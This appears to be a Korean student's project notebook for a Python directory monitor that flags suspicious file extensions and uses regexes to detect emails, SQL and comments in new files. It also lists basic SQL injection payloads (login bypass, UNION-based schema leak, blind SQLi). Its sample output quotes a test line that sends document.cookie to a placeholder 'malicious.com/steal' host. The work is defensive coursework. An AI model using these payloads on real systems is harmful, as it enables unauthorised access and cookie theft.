- **제출자: AI26_오준서**  
- **제출일: 2025-06-14**  
- **PBL03 : 디렉터리 감시를 통한 보안 위협 탐지 (특정 파일 생성과 민감정보 포함 여부를 실시간으로 감지하고 분석합니다)**
    - **1.디렉터리 : ./monitor_directory**
    - **2.새로운 파일 탐지 및 출력**
    - **3. .py, .js, .class 파일은 주의 파일로 분류**
    - **4.주요 정보 탐지 : 주석, 이메일, SQL문 (정규식 탐지)**
    
- **해결 가이드**
    - **파일 초기 목록 기록 -> 새로 생긴 파일 추적**
    - **주요 확장자 필터링 후 경고**
    - **내용 읽어 정규 표현식으로 민감 정보 탐지**

---
- **새파일 탐지, 주의 확장자 분류, 민감 정보 탐지 로직 정확도**
- **디렉터리 감시 구조, 반복 로직 및 예외 처리**
- **출력 메시지 명확성, 주석 처리, 사용자 친화적 메시지 여부**

공격에 사용하는 SQL 문들 정리 (간단한 SQL injection)
- 로그인 우회 : ' OR '1' ='1     ' OR 1=1 --    
    - 항상 참이 되게 만들어 인증 우회
- 데이터 조회 : SELECT * FROM users WHERE username = '' OR 1=1 --
    - 모든 사용자 데이터 노출
- DB 구조 유출 : UNION SELECT table_name, null FROM information_schema.tables --
- Blind SQLi : 1' AND (SELECT COUNT(*) FROM users) > 0 --
    - 참/거짓으로 조건 판단 (응답 시간 차이로 추론)

---
- **실시간으로 파일을 감지해서 로그파일로 만들자!**
- **감시 알고리즘은 while과 os 를 통해 구현 + 정규식**
- **로그 파일은 새로운 파일이 감지되고 민감정보라면 로그로 남기기**
- **로그 파일은 계속 이어쓰기 (a)**

- malicious.py (코드 구현 확인을 위한 민감정보 파일 생성 코드)
- test.py (정상적인 파일 생성 코드)
- monitor_directory.txt (모니터링 한 결과 저장 로그 파일)

In [4]:
import os
import time
import re
from datetime import datetime
import traceback

class PBL03Monitor:
    def __init__(self, monitor_dir="./monitor_directory", interval=1):
        """
        클래스 초기화 함수
        :param monitor_dir: 감시 대상 디렉터리 경로
        :param interval: 감시 주기 (초)
        """
        self.monitor_dir = monitor_dir
        self.interval = interval
        self.known_files = set()  # 이전에 이미 감지된 파일들
        
       
        try:
            base_dir = os.path.dirname(os.path.abspath(__file__))
        except NameError:
            base_dir = os.getcwd()
            
         # 로그 파일 경로 (현재 py파일 기준 위치에 생성됨)
        self.log_path = os.path.join(base_dir, "monitor_directory.txt")
        
        
        # 의심 확장자 리스트 (확장자만 보고도 경고)
        self.suspicious_extensions = ['.py', '.js', '.class']

        # 민감 정보 탐지용 정규표현식
        self.sensitive_patterns = {
            '이메일': r'[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+',
            'SQL문': r'\b(SELECT|INSERT|UPDATE|DELETE)\b.*?\bFROM\b',
            '주석': r'#.*|//.*|/\*[\s\S]*?\*/'
        }

    def get_current_files(self):
        """
        감시 대상 디렉터리의 파일 목록을 집합(set) 형태로 반환
        예외 발생 시 디렉터리를 생성하거나 오류 출력
        """
        try:
            return set(os.listdir(self.monitor_dir))
        except FileNotFoundError:
            print(f"디렉터리가 존재하지 않아 생성 중: {self.monitor_dir}")
            try:
                os.makedirs(self.monitor_dir)
                return set()
            except Exception as e:
                print(f"디렉터리 생성 실패: {e}")
        except PermissionError:
            print(f"디렉터리 접근 권한이 없습니다: {self.monitor_dir}")
        except Exception as e:
            print(f"알 수 없는 오류 발생: {e}")
            traceback.print_exc()
        return set()

    def check_sensitive_info(self, file_path):
        """
        파일 내 민감 정보(이메일, SQL, 주석)를 탐지하여 결과를 딕셔너리로 반환
        :param file_path: 전체 파일 경로
        :return: 감지된 민감 정보 {타입: [매치 내용]}
        """
        detected_info = {}
        try:
            with open(file_path, 'r', encoding='utf-8', errors='ignore') as f:
                content = f.read()
                for info_type, pattern in self.sensitive_patterns.items():
                    matches = re.findall(pattern, content, re.I)  # 대소문자 무시
                    if matches:
                        detected_info[info_type] = matches
                        print(f" *** 민감 정보 감지됨 [{info_type}]: {matches[:3]}")
        except FileNotFoundError:
            print(f"  파일이 삭제되었거나 존재하지 않습니다: {file_path}")
        except PermissionError:
            print(f"  파일 읽기 권한이 없습니다: {file_path}")
        except Exception as e:
            print(f"  파일 분석 중 오류 발생: {e}")
            traceback.print_exc()
        return detected_info

    def log_detection(self, filename, timestamp, full_path, ext_warning=False, sensitive_hits=None):
        """
        감지된 이상 파일 정보를 monitor_log.txt 에 저장
        :filename: 감지된 파일 이름
        :timestamp: 감지 시간 문자열
        :full_path: 감지된 파일의 전체 경로
        :ext_warning: 의심 확장자 여부
        :sensitive_hits: 감지된 민감 정보 딕셔너리
        """
        try:
            # 파일 크기 정보 얻기 (bytes)
            size_bytes = os.path.getsize(full_path)

            with open(self.log_path, "a", encoding="utf-8") as log_file:
                log_file.write(f"[{timestamp}] 감지된 파일: {filename}\n")
                log_file.write(f" - 파일 경로: {full_path}\n")
                log_file.write(f" - 파일 크기: {size_bytes} bytes\n")

                if ext_warning:
                    log_file.write(" - 의심 확장자 감지됨\n")
                if sensitive_hits:
                    for s_type, matches in sensitive_hits.items():
                        log_file.write(f" - 민감 정보 [{s_type}]: {matches}\n")
                log_file.write("\n")
        except Exception as e:
            print(f"로그 파일 기록 실패: {e}")
            traceback.print_exc()

    def monitor(self):
        """
        디렉터리를 지속적으로 감시하고 새로 생긴 파일을 분석
        의심 파일 또는 민감 정보가 있을 경우 로그로 저장
        """
        print(f"디렉터리 감시 시작: {self.monitor_dir}")
        self.known_files = self.get_current_files()

        while True:
            try:
                time.sleep(self.interval)
                current_files = self.get_current_files()
                new_files = current_files - self.known_files

                for file in new_files:
                    full_path = os.path.join(self.monitor_dir, file)
                    now_str = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
                    print(f"\n (new) 새 파일 탐지: {file} ({now_str})")

                    # 확장자 체크
                    _, ext = os.path.splitext(file)
                    ext_warning = ext in self.suspicious_extensions
                    if ext_warning:
                        print(f" 주의: 의심 확장자 파일 ({ext})")

                    # 민감 정보 검사
                    sensitive_hits = self.check_sensitive_info(full_path)

                    # 이상이 하나라도 있으면 로그 기록
                    if ext_warning or sensitive_hits:
                        self.log_detection(file, now_str, full_path, ext_warning, sensitive_hits)

                self.known_files = current_files

            except KeyboardInterrupt:
                print("\n디렉터리 감시 종료 (사용자 종료).")
                break
            except Exception as e:
                print(f"감시 중 예외 발생: {e}")
                traceback.print_exc()

    def run(self):
        """전체 감시 시스템 실행 진입점"""
        try:
            self.monitor()
        except Exception as e:
            print(f"시스템 치명적 오류 발생: {e}")
            traceback.print_exc()


# 실행 부분
if __name__ == "__main__":
    # 감시 클래스 실행 (1초 간격으로 ./monitor_directory 감시)
    monitor = PBL03Monitor(monitor_dir="./monitor_directory", interval=1)
    monitor.run()


디렉터리 감시 시작: ./monitor_directory

 (new) 새 파일 탐지: report.csv (2025-06-16 02:40:30)

 (new) 새 파일 탐지: summary.md (2025-06-16 02:40:30)
 *** 민감 정보 감지됨 [주석]: ['# 보고서 요약']

 (new) 새 파일 탐지: info.txt (2025-06-16 02:40:30)

 (new) 새 파일 탐지: logfile.log (2025-06-16 02:40:30)

 (new) 새 파일 탐지: Exploit.class (2025-06-16 02:40:44)
 주의: 의심 확장자 파일 (.class)
 *** 민감 정보 감지됨 [이메일]: ['exploit@mal.net']
 *** 민감 정보 감지됨 [SQL문]: ['DELETE']
 *** 민감 정보 감지됨 [주석]: ['/*\nMulti-line comment with email: exploit@mal.net\n*/']

 (new) 새 파일 탐지: innocent.txt (2025-06-16 02:40:44)

 (new) 새 파일 탐지: injector.js (2025-06-16 02:40:44)
 주의: 의심 확장자 파일 (.js)
 *** 민감 정보 감지됨 [이메일]: ['attacker@evil.com']
 *** 민감 정보 감지됨 [주석]: ['// Email: attacker@evil.com', '//malicious.com/steal?cookie=" + document.cookie);']

 (new) 새 파일 탐지: test_malicious.py (2025-06-16 02:40:44)
 주의: 의심 확장자 파일 (.py)
 *** 민감 정보 감지됨 [이메일]: ['hacker@example.com']
 *** 민감 정보 감지됨 [SQL문]: ['SELECT']
 *** 민감 정보 감지됨 [주석]: ['# 공격자 이메일', '# hacker@example.com']

디렉터리 감시 종료